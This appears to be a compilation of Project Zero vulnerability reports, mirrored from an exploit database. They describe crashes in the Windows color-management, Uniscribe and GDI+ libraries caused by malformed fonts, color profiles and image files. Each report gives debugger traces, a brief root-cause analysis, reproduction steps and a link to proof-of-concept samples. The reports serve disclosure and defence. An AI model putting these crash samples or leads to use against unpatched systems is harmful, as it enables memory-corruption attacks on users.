0x0c168003a980: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=>0x0c168003a990: fa fa fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
0x0c168003a9a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c168003a9b0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
0x0c168003a9c0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c168003a9d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c168003a9e0: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==119582==ABORTING
-->
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1054
We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function, while trying to translate colors based on a malformed color profile file:
---
(61e4.8620): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000453 ecx=0922cafd edx=00000c63 esi=0038f7ac edi=0004be40
eip=6ac573e9 esp=0038f6ec ebp=0038f784 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a:
6ac573e9 0fb61411 movzx edx,byte ptr [ecx+edx] ds:002b:0922d760=??
0:000> kb
ChildEBP RetAddr Args to Child
0038f784 6ac57844 0038f7ac 0038f840 00000000 icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a
0038f798 6ac4807d 0038f7ac 0038f840 76f611a9 icm32!LHCalc3to3_Di16_Do16_Lut8_G32+0x12
0038f8ac 6ac4204c 07b46e58 085f1000 000285c3 icm32!LHMatchColorsPrivate+0xef
0038f8c0 6c5ecab5 00000100 07de1000 000285c3 icm32!CMTranslateColors+0x44
0038f940 011c1963 4f42e2c8 07de1000 000285c3 mscms!TranslateColors+0x108
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it is necessary to use a dedicated program which loads the file, creates a color transform and translates some colors.
Attached are two color profiles which trigger the crash at two different offsets within the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41659.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1053
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ScriptApplyLogicalWidth function, while trying to display a malformed EMF file:
---
(920c.9190): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001e6fe4 ebx=00000000 ecx=00000007 edx=00000000 esi=00000007 edi=00000007
eip=751e6f3c esp=002ef0c8 ebp=002ef0ec iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
USP10!ScriptApplyLogicalWidth+0x10c:
751e6f3c 8b04b8 mov eax,dword ptr [eax+edi*4] ds:002b:001e7000=????????
0:000> kb
ChildEBP RetAddr Args to Child
002ef0ec 751f4039 001e6fe4 0000008f 0000008f USP10!ScriptApplyLogicalWidth+0x10c
002ef140 751f435d 00000105 002ef170 0a6a1cbc USP10!ApplyPiDxToItem+0x89
002ef184 751e7a04 ffffffff 00000004 000000a0 USP10!ScriptStringAnalyzeGlyphs+0x20d
002ef19c 76ca5465 1d011f2d 0a6a1bd8 00001000 USP10!ScriptStringAnalyse+0x284
002ef1e8 76ca3a3d 1d011f2d 0935f000 00001000 LPK!LpkStringAnalyse+0xe5
002ef238 76ca3af2 1d011f2d 00000064 00000064 LPK!InternalTextOut+0x1cd
002ef26c 76ccda50 1d011f2d 00000064 00000064 LPK!LpkExtTextOut+0x32
002ef7d8 76ccda90 1d011f2d 00000064 00000064 GDI32!ExtTextOutInternalA+0x3aa
002ef804 76ce7fed 1d011f2d 00000064 00000064 GDI32!ExtTextOutA+0x24
002ef838 76cd50cd 1d011f2d 04ed8ff8 00000002 GDI32!MREXTTEXTOUT::bPlay+0x7f
002ef8b0 6c85fc37 1d011f2d 04ed8ff8 001e01e8 GDI32!PlayEnhMetaFileRecord+0x2c5
002ef8c8 6c860e3a 00000053 07bdbcb0 00006044 gdiplus!EmfEnumState::PlayRecord+0x3a
002ef8e0 6c83881a 00000053 00006044 001e01f0 gdiplus!EmfEnumState::ProcessRecord+0xb1
002ef8fc 6c8389e0 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
002ef924 76cd58a4 1d011f2d 04ed8ff8 001e01f0 gdiplus!EnumEmfDownLevel+0x6e
002ef9b0 6c83abb4 1d011f2d 403581b3 6c838972 GDI32!bInternalPlayEMF+0x6a3
002ef9e8 6c83d317 1d011f2d 924626c1 002efa74 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
002efa90 6c83f3c1 00000000 924626c1 002efbd8 gdiplus!GpGraphics::EnumEmf+0x391
002efbf0 6c8448c9 00000000 00000001 00000001 gdiplus!GpMetafile::EnumerateForPlayback+0x5a7
002efcec 6c84494d 07bd5f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
002efd50 6c80e03f 07bd5f28 002efd78 002efd88 gdiplus!GpGraphics::DrawImage+0x51
002efdb8 6c80e0d3 07bd1d28 438f3857 00000000 gdiplus!GdipDrawImage+0x130
002efde4 013e1747 07bd1d28 07bd5f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).
Attached is ane EMF file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41658.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1052
We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!Fill_ushort_ELUTs_from_lut16Tag function, while trying to display a TIFF image with a malformed embedded color profile:
---
(7c1c.93b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0028f0dc ecx=0984f7c0 edx=00006ff0 esi=0980f800 edi=00000100
eip=6ac4f701 esp=0028ecc8 ebp=0028ecf4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4:
6ac4f701 0fb711 movzx edx,word ptr [ecx] ds:002b:0984f7c0=????
0:000> kb
ChildEBP RetAddr Args to Child
0028ecf4 6ac495bd 0028f0dc ff837f84 00004000 icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4
0028ed28 6ac4b117 0028f0dc 0028ef54 00002100 icm32!ExtractElutFromLut16+0xec
0028ed80 6ac4ca1d 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_LutsFromLut16+0x10a
0028edac 6ac4ccbf 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_Luts+0x8c
0028ee3c 6ac4d562 0028f0dc 0028ef54 00000000 icm32!ExtractAllLuts+0x257
0028f148 6ac4e947 0953ee58 09534ff0 061f7f70 icm32!CreateCombi+0x725
0028f2ec 6ac43c84 0953ee58 09534ff0 00000000 icm32!PrepareCombiLUTs+0x3a6
0028f498 6ac42dba 0953ee58 09534ff0 09534ff0 icm32!CMMConcatInitPrivate+0x23e
0028f4b4 6ac41630 0028f520 09534ff0 0028f5c4 icm32!CWConcatColorWorld4MS+0x42
0028f4e0 6ac41fce 0028f520 00180002 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
0028f508 6c5ec8af 0028f5bc 00000002 0028f5c4 icm32!CMCreateMultiProfileTransform+0x20
0028f57c 6d2fd7c8 0028f5bc 00000002 0028f5c4 mscms!CreateMultiProfileTransform+0x22d
0028f5a0 6d2fb62c 0028f5bc 0028f5c4 00000000 WindowsCodecsExt!ICMModule::CreateMultiProfileTransform+0x27
0028f5d4 6d2f58cd 06277f90 40c8e2f0 40cf42f0 WindowsCodecsExt!CIcmColorTransform::CreateVectorTransform+0x6f
0028f640 69b25e74 09744f88 0970afac 0028f6b4 WindowsCodecsExt!CFormatConverterNChannel::Initialize+0x4b2
0028f6d8 6c8ea4be 0970cf90 0970afac 0028f710 WindowsCodecs!CFormatConverterResolver::Initialize+0x318
0028f724 6c8ec909 0010300c 00000000 07b67f68 gdiplus!GpWicDecoder::InitFormatConverter+0x7e
0028f760 6c8e9d72 00000000 07b55fd0 07b4df98 gdiplus!GpWicDecoder::DecodeFrame+0xb5
0028f774 6c8ddeb8 07b67f68 07b4df98 07b4df98 gdiplus!GpWicDecoder::GetImageInfo+0x29
0028f798 6c8de328 07b4df98 0000027f 07b4df38 gdiplus!GpDecodedImage::InternalGetImageInfo+0x3f
0028f7b8 6c830aee 07b55fd0 07b4df98 07b4bcd8 gdiplus!GpDecodedImage::GetImageInfo+0x18
0028f7cc 6c832cd3 0028f880 0028f7e8 6c83330d gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x48
0028f7d8 6c83330d 0028f880 07b45f28 0028f7f8 gdiplus!CopyOnWriteBitmap::Create+0x1d
0028f7e8 6c8342aa 0028f880 07b43ff4 0028f81c gdiplus!GpBitmap::GpBitmap+0x2c
0028f7f8 6c803e8d 0028f880 085a1000 07b43ff0 gdiplus!GpImage::LoadImageW+0x69
0028f81c 003b171f 0028f880 07b43ff4 b2121dcf gdiplus!GdipLoadImageFromFile+0x74
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).
Attached is a TIFF file which triggers the crash.
################################################################################
A similar crash with a slightly different stack trace was also encountered in the icm32!Fill_byte_ALUTs_from_lut16Tag function:
---
(62a8.4d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000001fe ebx=09222000 ecx=09220ffe edx=00000801 esi=000003fc edi=0924d3f8
eip=6ac4f821 esp=002bf594 ebp=002bf5b8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a:
6ac4f821 0fb711 movzx edx,word ptr [ecx] ds:002b:09220ffe=????
0:000> kb
ChildEBP RetAddr Args to Child
002bf5b8 6ac4aa4d 002bf9a0 00000801 0924d3f8 icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a
002bf5ec 6ac4b0f3 0002a000 002bf818 00007000 icm32!ExtractAlutFromLut16+0xe2
002bf644 6ac4ca1d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_LutsFromLut16+0xe6
002bf670 6ac4cd0d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_Luts+0x8c
002bf700 6ac4d562 002bf9a0 002bf818 00000000 icm32!ExtractAllLuts+0x2a5
002bfa0c 6ac4e947 07c46e58 07c44fe8 07c48ef8 icm32!CreateCombi+0x725
002bfbb0 6ac43c84 07c46e58 07c44fe8 00000000 icm32!PrepareCombiLUTs+0x3a6
002bfd5c 6ac42dba 07c46e58 07c44fe8 07c44fe8 icm32!CMMConcatInitPrivate+0x23e
002bfd78 6ac41630 002bfde4 07c44fe8 002bfea8 icm32!CWConcatColorWorld4MS+0x42
002bfda4 6ac41fce 002bfde4 00080000 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
002bfdcc 6c5ec8af 002bfe98 00000004 002bfea8 icm32!CMCreateMultiProfileTransform+0x20
002bfe40 011c1923 002bfe98 00000004 002bfea8 mscms!CreateMultiProfileTransform+0x22d
[...]
---
Attached is a color profile which triggers the above crash. In order to reproduce it, it is necessary to use a dedicated program which loads the file and creates a color transform.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41657.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1042
We have encountered a crash in the Windows GDI+ library, in the gdiplus!GetRECTSForPlayback function, while trying to display a malformed EMF+ image file:
---
(6be8.6f1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=ffffadd6 ecx=000c1000 edx=00000000 esi=0000348f edi=00000000
eip=6c83a189 esp=0023f21c ebp=0023f238 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
gdiplus!GetRECTSForPlayback+0xe2:
6c83a189 8a11 mov dl,byte ptr [ecx] ds:002b:000c1000=??
0:000> kb
ChildEBP RetAddr Args to Child
0023f238 6c83c8a3 000001e0 00000018 00000800 gdiplus!GetRECTSForPlayback+0xe2
0023f294 6c8387e3 07b6bcb0 0000403a 00008800 gdiplus!SetTSClipEPR::Play+0x71
0023f2b4 6c83a88d 0000403a 00008800 00000018 gdiplus!GdipPlayMetafileRecordCallback+0x35
0023f2e4 6c83e32c 00000278 000c013c 000c0000 gdiplus!MetafilePlayer::EnumerateEmfPlusRecords+0x73
0023f2fc 76cd58a4 070125f7 04e18ff8 000c0098 gdiplus!EnumEmfWithDownLevel+0x61
0023f388 6c83abb4 070125f7 403581b3 6c83e2cb GDI32!bInternalPlayEMF+0x6a3
0023f3c0 6c83e5b1 070125f7 08462d83 0023f440 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
0023f460 6c83f592 42776037 08462d83 0023f598 gdiplus!GpGraphics::EnumEmfPlusDual+0x1e7
0023f5b0 6c8448c9 00000000 42cc0000 42d80000 gdiplus!GpMetafile::EnumerateForPlayback+0x778
0023f6ac 6c84494d 07b65f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
0023f710 6c80e03f 07b65f28 0023f738 0023f748 gdiplus!GpGraphics::DrawImage+0x51
0023f778 6c80e0d3 07b61d28 4269b097 00000000 gdiplus!GdipDrawImage+0x130
0023f7a4 000e1747 07b61d28 07b65f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---
The crash appears to be caused by insufficient validation of the record size in relation to the number of declared rectangles, in the handler of the EmfPlusSetTSClip EMF+ record. It is unclear if the bug can also lead to memory corruption (likely not), but it could still potentially lead to the disclosure of junk/out-of-bounds heap bytes.
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).
Attached is an archive with two samples, which trigger crashes at two different offsets within the gdiplus!GetRECTSForPlayback function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41656.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1031
Through fuzzing, we have discovered a number of different crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file or calling documented Uniscribe API functions against such malformed fonts. In this bug, we address a variety of crashes manifested through invalid memory READ accesses. Some of them occur at page boundaries, while other at seemingly valid yet non-mapped addresses. The sheer amount of the crashes makes it very difficult for us to assess the root cause, severity and impact of each of them within a reasonable time-frame. Consequently, we have only performed basic deduplication based on the top-level address of the faulting instruction, and are reporting all of such crashes in this single bug tracker entry.
A summary of the crash locations is as follows:
--------------------------------------------------------------
1 USP10!otlMultiSubstLookup::apply+0xa8
2 USP10!otlSingleSubstLookup::applyToSingleGlyph+0x98
3 USP10!otlSingleSubstLookup::apply+0xa9
4 USP10!otlMultiSubstLookup::getCoverageTable+0x2c
5 USP10!otlMark2Array::mark2Anchor+0x18
6 USP10!GetSubstGlyph+0x2e
7 USP10!BuildTableCache+0x1ca
8 USP10!otlMkMkPosLookup::apply+0x1b4
9 USP10!otlLookupTable::markFilteringSet+0x1a
10 USP10!otlSinglePosLookup::getCoverageTable+0x12
11 USP10!BuildTableCache+0x1e7
12 USP10!otlChainingLookup::getCoverageTable+0x15
13 USP10!otlReverseChainingLookup::getCoverageTable+0x15
14 USP10!otlLigCaretListTable::coverage+0x7
15 USP10!otlMultiSubstLookup::apply+0x99
16 USP10!otlTableCacheData::FindLookupList+0x9
17 USP10!ttoGetTableData+0x4b4
18 USP10!GetSubtableCoverage+0x1ab
19 USP10!otlChainingLookup::apply+0x2d
20 USP10!MergeLigRecords+0x132
21 USP10!otlLookupTable::subTable+0x23
22 USP10!GetMaxParameter+0x53
23 USP10!ApplyLookup+0xc3
24 USP10!ApplyLookupToSingleGlyph+0x6f
25 USP10!ttoGetTableData+0x19f6
26 USP10!otlExtensionLookup::extensionSubTable+0x1d
27 USP10!ttoGetTableData+0x1a77
--------------------------------------------------------------
All of the issues reproduce successfully on Windows 7. It is highly encouraged to enable PageHeap for the test program in order to get reliable repros. It is also necessary to use a custom program which displays all of the font's glyphs at various point sizes, and additionally calls some of the Uniscribe-specific API functions.
Attached is an archive with textual crash excerpts and up to 3 samples per each unique crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41655.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1030
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!FillAlternatesList function, while trying to request a list of alternate glyphs for a specific glyph in a corrupted font file:
---
(4bfc.c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000d ebx=0021006f ecx=00000010 edx=00000018 esi=07b4bfe8 edi=0021f620
eip=75232fe1 esp=0021f550 ebp=0021f5b8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
USP10!FillAlternatesList+0x2d1:
75232fe1 66891c32 mov word ptr [edx+esi],bx ds:002b:07b4c000=????
0:000> kb
ChildEBP RetAddr Args to Child
0021f5b8 7522eb56 09312db6 00000000 00000003 USP10!FillAlternatesList+0x2d1
0021f5ec 75208b38 0021f640 0021f614 746c6161 USP10!GetOtlGlyphAlternates+0x86
0021f770 7520f214 0021f9d8 6e74616c 746c6664 USP10!OtlGetAlternateGlyphList+0x108
0021f7a0 00dc4557 30011a14 00000001 00000000 USP10!ScriptGetFontAlternateGlyphs+0xb4
[...]
---
In our test harness, we set the cMaxAlternates parameter of the ScriptGetFontAlternateGlyphs function to 10, indicating that this is the maximum number of values which can be written to the output pAlternateGlyphs array. However, the API function does not seem to respect the argument and attempts to write more data into the buffer -- in this case, 29 WORDs. The vulnerability can also be confirmed by looking at the output value of pcAlternates, which should never exceed 10 in this case, but is indeed set to 29. As a result, the bug may lead to corruption of various memory areas, including stack, heap, and static memory, depending on the type of pointer passed to the function by its caller.
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled and the output buffer allocated from the heap. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the vulnerable API function.
Attached is a proof of concept malformed font file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41654.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1029
We have encountered a number of crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file. While crashes in this specific family take various shapes and forms, they all occur in functions directly or indirectly called by USP10!BuildFSM. An example crash excerpt is shown below:
---
(5020.4074): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000cc ebx=0964b270 ecx=0964c6aa edx=0038f409 esi=00000782 edi=0963d7d0
eip=751f968d esp=0038f3bc ebp=0038f468 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
USP10!BuildDynamicStatesStaticInputs+0x45d:
751f968d 668944b302 mov word ptr [ebx+esi*4+2],ax ds:002b:0964d07a=????
0:000> kb
ChildEBP RetAddr Args to Child
0038f468 751f7a33 00000048 09649700 0000001a USP10!BuildDynamicStatesStaticInputs+0x45d
0038f6a0 751f7076 095d3d88 095e1fa8 0038f6cc USP10!BuildFSM+0x193
0038f6b0 751fc5f4 c10125b4 095d3d88 095c6124 USP10!LoadArabicShapeTables+0x106
0038f6cc 751ea5a0 c10125b4 0963d7d0 0000001a USP10!ArabicLoadTbl+0xd4
0038f6f0 751ea692 095c6124 c10125b4 0000001a USP10!UpdateCache+0xb0
0038f704 751f152d c10125b4 095c6000 751f15db USP10!ScriptCheckCache+0x62
0038f710 751f15db 00000001 00000001 095c62e8 USP10!GetShapeFunction+0xd
0038f748 751f2b14 00000001 00000000 0038f7c8 USP10!RenderItemNoFallback+0x5b
0038f774 751f2da2 00000001 00000000 0038f7c8 USP10!RenderItemWithFallback+0x104
0038f798 751f4339 00000000 0038f7c8 095c6124 USP10!RenderItem+0x22
0038f7dc 751e7a04 000004a0 00000400 c10125b4 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0038f7f4 76ca5465 c10125b4 095c6040 0000000a USP10!ScriptStringAnalyse+0x284
0038f840 76ca5172 c10125b4 0038fc28 0000000a LPK!LpkStringAnalyse+0xe5
0038f93c 76ca1410 c10125b4 00000000 00000000 LPK!LpkCharsetDraw+0x332
0038f970 763c18b0 c10125b4 00000000 00000000 LPK!LpkDrawTextEx+0x40
0038f9b0 763c22bf c10125b4 00000040 00000000 USER32!DT_DrawStr+0x13c
0038f9fc 763c21f2 c10125b4 0038fc28 0038fc3c USER32!DT_GetLineBreak+0x78
0038faa8 763c14d4 c10125b4 00000000 0000000a USER32!DrawTextExWorker+0x255
0038facc 763c2475 c10125b4 0038fc28 ffffffff USER32!DrawTextExW+0x1e
0038fb00 01196a5c c10125b4 0038fc28 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a ebx
address 0964b270 found in
_DPH_HEAP_ROOT @ 95c1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
95c2ed4: 964b270 1d8c - 964b000 3000
5dbb8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
774e3431 ntdll!RtlAllocateHeap+0x0000023a
5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
751f6644 USP10!UspAllocCache+0x00000054
751f7975 USP10!BuildFSM+0x000000d5
751f7076 USP10!LoadArabicShapeTables+0x00000106
751fc5f4 USP10!ArabicLoadTbl+0x000000d4
751ea5a0 USP10!UpdateCache+0x000000b0
751ea692 USP10!ScriptCheckCache+0x00000062
751f152d USP10!GetShapeFunction+0x0000000d
751f2b14 USP10!RenderItemWithFallback+0x00000104
751f2da2 USP10!RenderItem+0x00000022
751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
751e7a04 USP10!ScriptStringAnalyse+0x00000284
76ca5465 LPK!LpkStringAnalyse+0x000000e5
76ca5172 LPK!LpkCharsetDraw+0x00000332
76ca1410 LPK!LpkDrawTextEx+0x00000040
763c18b0 USER32!DT_DrawStr+0x0000013c
763c22bf USER32!DT_GetLineBreak+0x00000078
763c21f2 USER32!DrawTextExWorker+0x00000255
763c14d4 USER32!DrawTextExW+0x0000001e
763c2475 USER32!DrawTextW+0x0000004d
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 2 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41653.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1028
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!UpdateGlyphFlags function, while trying to display text using a corrupted font file:
---
(5268.3b50): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003fe0 ebx=0000ffff ecx=000007fc edx=0050ee58 esi=0000f803 edi=0931c020
eip=75230c90 esp=0050eb48 ebp=0050eb50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
USP10!UpdateGlyphFlags+0x30:
75230c90 66834c380210 or word ptr [eax+edi+2],10h ds:002b:09320002=????
0:000> kb
ChildEBP RetAddr Args to Child
0050eb50 752336b3 42555347 0050ee58 00000000 USP10!UpdateGlyphFlags+0x30
0050ed2c 7522f29f 42555347 0050ee68 0050ee3c USP10!ApplyFeatures+0x553
0050ed78 7522b083 00000000 00000000 00000000 USP10!SubstituteOtlGlyphs+0x1bf
0050eda4 75226d5c 0050edd4 0050ee4c 0050ee68 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0050f010 7521548a 0050f11c 0050f148 0050f130 USP10!GenericEngineGetGlyphs+0xa1c
0050f0d0 7521253f 0050f11c 0050f148 0050f130 USP10!ShapingGetGlyphs+0x36a
0050f1bc 751e5c6f 7901150c 09316124 09316318 USP10!ShlShape+0x2ef
0050f200 751f167a 7901150c 09316124 09316318 USP10!ScriptShape+0x15f
0050f260 751f2b14 00000000 00000000 0050f2e0 USP10!RenderItemNoFallback+0xfa
0050f28c 751f2da2 00000000 00000000 0050f2e0 USP10!RenderItemWithFallback+0x104
0050f2b0 751f4339 00000000 0050f2e0 09316124 USP10!RenderItem+0x22
0050f2f4 751e7a04 000004a0 00000400 7901150c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0050f30c 76ca5465 7901150c 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0050f358 76ca5172 7901150c 0050f740 0000000a LPK!LpkStringAnalyse+0xe5
0050f454 76ca1410 7901150c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0050f488 763c18b0 7901150c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0050f4c8 763c22bf 7901150c 00000070 00000000 USER32!DT_DrawStr+0x13c
0050f514 763c21f2 7901150c 0050f740 0050f754 USER32!DT_GetLineBreak+0x78
0050f5c0 763c14d4 7901150c 00000000 0000000a USER32!DrawTextExWorker+0x255
0050f5e4 763c2475 7901150c 0050f740 ffffffff USER32!DrawTextExW+0x1e
0050f618 001a6a5c 7901150c 0050f740 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a eax+edi
address 09320000 found in
_DPH_HEAP_ROOT @ 9311000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
9311f38: 931c000 4000 - 931b000 6000
5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
774e3431 ntdll!RtlAllocateHeap+0x0000023a
5dbea792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
751f68fa USP10!UspAllocStatic+0x000000aa
751f6cea USP10!UspAcquireTempAlloc+0x0000002a
751e8778 USP10!ScriptRecordDigitSubstitution+0x00000028
76ca5304 LPK!ReadNLSScriptSettings+0x00000074
76ca53b8 LPK!LpkStringAnalyse+0x00000038
76ca5172 LPK!LpkCharsetDraw+0x00000332
76ca1410 LPK!LpkDrawTextEx+0x00000040
763c18b0 USER32!DT_DrawStr+0x0000013c
763c22bf USER32!DT_GetLineBreak+0x00000078
763c21f2 USER32!DrawTextExWorker+0x00000255
763c14d4 USER32!DrawTextExW+0x0000001e
763c2475 USER32!DrawTextW+0x0000004d
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 3 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41652.zip